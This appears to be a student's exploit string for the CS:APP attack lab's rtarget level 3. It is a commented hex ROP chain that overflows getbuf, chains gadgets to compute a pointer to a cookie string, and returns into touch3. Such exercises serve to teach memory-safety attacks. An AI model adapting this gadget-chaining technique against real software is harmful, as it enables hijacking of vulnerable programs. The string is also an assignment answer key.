/* stack size: 0x28 */
/* touch3: 4018fa */
/* cookie: 0x59b997fa */
/* cookie as string: 35 39 62 39 39 37 66 61 00 */

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 /* fill stack */
06 1a 40 00 00 00 00 00 /* getbuf            return address: addval_190 + 0x3; movq $rsp,$rax */
a2 19 40 00 00 00 00 00 /* gadget addval_190 return address: addval_273 + 0x2; movq $rax,$rdi */
ab 19 40 00 00 00 00 00 /* gadget addval_273 return address: addval_219 + 0x4; popq $rax */
48 00 00 00 00 00 00 00 /* -0x28 */
42 1a 40 00 00 00 00 00 /* gadget addval_219 return address: addval_487 + 0x2; movl $eax,$edx */
69 1a 40 00 00 00 00 00 /* gadget addval_487 return address: getval_311 + 0x1; movl $edx,$ecx */
27 1a 40 00 00 00 00 00 /* gadget getval_311 return address: addval_187 + 0x2; movl $ecx,$esi */
d6 19 40 00 00 00 00 00 /* gadget addval_187 return address: add_xy; lea ($rdi,$rsi,1),$rax */
a2 19 40 00 00 00 00 00 /* add_xy            return address: addval_273 + 0x2; movq $rax,$rdi */
fa 18 40 00 00 00 00 00 /* gadget addval_273 return address: touch3 */
35 39 62 39 39 37 66 61 /* cookie as string */
00 /* string continued */
